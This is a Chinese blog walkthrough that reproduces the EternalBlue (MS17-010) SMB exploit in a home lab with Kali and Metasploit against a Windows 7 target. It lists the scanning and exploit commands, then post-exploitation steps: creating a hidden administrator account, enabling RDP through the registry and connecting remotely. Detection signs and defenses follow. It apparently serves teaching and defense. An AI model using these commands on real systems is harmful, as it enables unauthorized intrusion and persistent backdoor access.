永恒之蓝(MS17-010)

已于 2024-08-08 11:25:58 修改
阅读量1.6k 收藏 17
点赞数 36
CC 4.0 BY-SA版权
分类专栏: 漏洞复现 文章标签: 安全 网络
于 2024-08-06 20:45:43 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_50853870/article/details/140964322

1.永恒之蓝介绍

爆发时间:17.5.12

端口:tcp的445端口和139端口

影响版本:WindowsNT,Windows2000、Windows XP、Windows 2003、Windows Vista、Windows 7、Windows 8,Windows 2008、Windows 2008 R2、Windows Server 2012 SP0

2.原理

永恒之蓝漏洞通过TCP的445和139端口,利用SMB1和NBT中的远程代码执行漏洞,通过恶意代码扫描并攻击开放445文件共享端口的win主机,进行勒索病毒、挖矿、反弹shell等

3.SMB协议

SMB是一个协议服务器信息块,它是一个客户机/服务器,请求/响应协议,通过SMB协议可以在计算机间共享文件,命名管道等资源,电脑上网上邻居就是靠SMB实现的;可以用在TCP/IP协议上,SMB使用TCP139端口和TCP445端口

4.实验准备

攻击机:kali ,地址:192.168.3.183

靶机:win7,地址:192.168.3.160

条件:两台机子互相之间可以ping通,并且靶机打开了445端口,防火墙是关闭的

5.实验步骤

1.提权

sudo su

2.探测网段内存活的主机

nmap -sP 192.168.3.1/24

3.查看目标主机的端口开放情况

nmap -sT 192.168.3.160

看到445端口确实开放

4.使用MSF(美少妇)的永恒之蓝模块

msfconsole

每次打开都会加载一个随机界面MSF

5.搜索ms17-010代码

search ms17_010

永恒之蓝扫描模块:auxiliary/scanner/smb/smb_ms17_010

永恒之蓝攻击模块:exploit/windows/smb/ms17_010_eternalblue

6.使用MS17-010的扫描模块,对靶机进行扫描

use auxiliary/scanner/smb/smb_ms17_010

7.设置目标IP或设置网段

set rhosts 192.168.3.160

8.执行扫描

run

9.使用MS17-010的攻击模块,对靶机进行攻击

use exploit/windows/smb/ms17_010_eternalblue

10.设置攻击目标IP或设置攻击网段

set rhosts 192.168.3.160

11.执行攻击

run

12.得到靶机shell

shell

进入win7的终端

13.通过靶机对shell进行控制

1.解决乱码

chcp 65001

2.创建新用户

net user $用户名 密码 /add

$是创建隐藏账户

3.将用户添加到管理员组

net localgroup administrators 用户名 /add

4.查看端口开放情况

netstat -ano

5.开启3389端口

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

6.远程连接主机

rdesktop 192.168.3.160:3389

6.流量特征

1.会出现卡顿、耗电提高、收到勒索信息、服务器拒绝服务等特征。

2.在告警设备上可以看到多次告警提示,攻击者首先会探测主机、端口扫描,这些都会告警,其次会出现SMF利用告警、getshell也会告警;除此之外可以查看端口开放情况、外联情况;以及查看日志...

7.防御

1.关闭文件共享;

2.不要随意打开陌生的文件;

3.禁用SMB1协议;

4.使用防火墙阻止445端口的连接,或者使用进/出站规则阻止445端口的连接;

5.安装杀毒软件,可以通过杀毒软件的安全检测来帮助我们来抵御黑客攻击的危害,及时更新病毒库。

MS17-010永恒之蓝漏洞利用,win32安装,windows 7 32位
linxaiomo
02-20 2万+
漏洞复现:MS17-010 漏洞利用的条件:1.靶机开启445端口(如果未打开该端口将会攻击失败,百度打开445端口) 2.关闭防火墙 靶机:windows 7(未知X32位还是X64位) ip:192.168.1.9 攻击机:kali linux (X64) ip:192.168.1.101 使用工具:meatsploit,nmap 前期准备工作:由于kali是64位,如果windows 7 是32 位,所以我们得安装wine3...
关于永恒之蓝MS17-010的描述影响范围及修复方案
weixin_55811105的博客
04-18 4833
远程代码执行漏洞(MS17-010)加固 1、 漏洞描述 ①SMB协议是一 个通过网络在共享文件、打印设备、命名管道、邮槽之间操作数据的协议。利用该协议,客户端就可以去访问服务器上的共享文件和目录(增删改查)、打印队列和进程间通信服务等,还可以实现客户端和服务器之间的远程过程子协议的认证传输。 ②Windows的SMB服务处理 SMBv1接收的特殊设计的数据包,发生缓冲区溢出,导致攻击者在目标系统上可以执行任意代码。 2、漏洞威胁 能远程主动发起对漏洞主机135\137\138\139\445端口的扫描,并
ms17-010 永恒之蓝
qq_62803993的博客
01-12 5536
什么是永恒之蓝 永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。
永恒之蓝MS17-010复现
m0_74795359的博客
06-12 360
永恒之蓝(EternalBlue)是一个针对Microsoft Windows系统SMB协议漏洞的计算机攻击工具,漏洞编号为CVE-2017-0144,属于Microsoft安全公告MS17-010中描述的远程代码执行漏洞。该漏洞允许攻击者在无需用户交互的情况下,通过向目标系统的SMB服务发送特制数据包来获得系统控制权。2017年4月,黑客组织"影子经纪人"公开泄露了这个工具,使得该漏洞被广泛利用于恶意攻击活动。
MS17-010(Eternal blue永恒之蓝)漏洞利用+修复方法
记录学习
06-21 6722
msf永恒之蓝漏洞复现过程以及修复建议
永恒之蓝ms-17-010
尘玥的故事
07-18 880
2.saerch ms17-010 #命令搜索漏洞编号ms17-010相关模块。来到这个页面后的第一部是按键盘上的“i”键,左下角出现“插入”后说明操作正确。从下面的源内选择一个复制下来准备粘贴进去(都是优质源,复制哪个都可以)。尝试运行一个:screenshare—实时监控当前主机界面。换源vim /etc/apt/sources.list。-P:指定端口扫描(0-65535为全端口)使用“#”将原本的源给注释掉。-sC:使用内置脚本进行扫描。-sT:TCP全连接扫描。-sV:识别服务版本。
永恒之蓝MS17-010
BvxiE的博客
12-26 4075
温馨提醒:纯水文,如果不幸翻到这篇文章,可以立刻关闭!
Windows漏洞 MS17-010 / EternalBlue(永恒之蓝)工具-易语言
06-11
MS17-010 / EternalBlue(永恒之蓝) 漏洞 检测工具 百度百科: https://baike.baidu.com/item/永恒之蓝 本源码 无调用 任何模块 测试环境: Microsoft Windows XP x86 Microsoft Windows Server 2003 x86 漏洞涉及 ...
网安永恒之蓝MS17-010检测工具.zip
03-01
永恒之蓝MS17-010,漏洞检测工具
记复现永恒之蓝ms17-010漏洞笔记
x202231的博客
11-01 941
在渗透电脑的路上有很多人不知道该怎么做不知道到底对不对,那么本章就介绍利用永恒之蓝漏洞去渗透一台win7的电脑。这个漏洞算是比较常见的漏洞也是非常的好用具体后面的可以参考其他的博客文章。
网络安全入门第一课—永恒之蓝ms17-010
m0_56088051的博客
07-13 7104
一、永恒之蓝(Eternal Blue)永恒之蓝相关病毒,其实是利用了微软的MS17-010漏洞。MS17-010是Windows系统一个底层服务的漏洞,恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序二、实验环境。
渗透测试--MS17-010永恒之蓝)漏洞
jxy158212的博客
08-08 1482
nmap是目前最流行的网络扫描工具,不仅能准确探测单台主机的详细情况,而且能高效地对大范围的Ip地址段扫描。能扫描目标网络上有哪些主机上存活的,哪些服务是开放的,甚至知道网络中使用了何种类型的防火墙设备等。常见指令-sT:TCP connect扫描-sF/-sX/-sN:通过发送一些特殊的标志位以避开设备或软件的检测-sP:通过发送ICMP echo请求探测主机是否存活,原理同Ping-sU:探测目标主机开放了哪些UDP端口-sA:TCP ACK扫描,对防火墙上未屏蔽的端口进行探测。
MSF 每日一练】MS17-010永恒之蓝
2301_79577213的博客
05-11 1140
本文介绍了Metasploit Framework(MSF)的基本使用方法和MS17-010永恒之蓝)漏洞的利用过程。MSF是一个开源的渗透测试框架,集成了多种漏洞利用模块、辅助模块和后渗透工具,适合初学者学习。文章详细讲解了MSF的主要组件、基本命令和使用流程,并通过MS17-010漏洞的实例,展示了从信息收集、漏洞扫描到漏洞利用、后门植入的完整渗透测试过程。通过本文,读者可以初步掌握MSF的基本操作和渗透测试的基本思路。
Metasploit永恒之蓝ms17_010
最新发布
m0_62908421的博客
07-16 764
MS17-010永恒之蓝)是Windows SMBv1协议中的高危漏洞,允许远程代码执行,CVSS评分为10.0。漏洞源于SrvOs2FeaListSizeToNt函数的内存计算错误,攻击者通过构造畸形FEALIST数据包触发堆溢出,覆盖关键指针并注入内核级Shellcode。典型攻击链包含Grooming内存布局、溢出覆盖SRVNET_BUFFER_HDR结构、APC注入执行Payload等步骤,利用工具如Metasploit可实现自动化攻击。
ms17-010永恒之蓝) 漏洞复现与处理
热门推荐
diaobusi的博客
06-05 1万+
ms17_010 是一种操作系统漏洞,仅影响 Windows 系统中的 SMBv1 服务。这个漏洞是由于 SMBv1 内核函数中的缓冲区溢出而导致的。攻击者可以通过该漏洞控制目标系统,并执行任意代码。这个漏洞通过 445 文件共享端口进行利用,一旦攻击者成功利用该漏洞,就可以在目标主机上植入各种恶意软件,如勒索软件。最近出现的 WannaCry 勒索软件就使用 ms17_010 漏洞来传播和植入勒索代码,将目标系统中的所有文件加密并威胁用户付款。
MS17-010(永恒之蓝)—漏洞复现及防范》
weixin_47118413的博客
04-10 1万+
通过Kali使用msfconsole在Win7复现MS17-010(永恒之蓝)漏洞以及如何防范。
永恒之蓝ms17-010
05-13
永恒之蓝(EternalBlue)是一个漏洞利用工具,用于攻击Windows操作系统中的MS17-010漏洞。该漏洞利用工具是由美国国家安全局(NSA)开发的,后来被黑客组织“影子经纪人”(Shadow Brokers)泄露。它被用于多次全球性的网络攻击,如WannaCry勒索病毒和NotPetya病毒。建议用户及时升级防病毒软件和操作系统补丁,以避免被该漏洞利用工具攻击。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值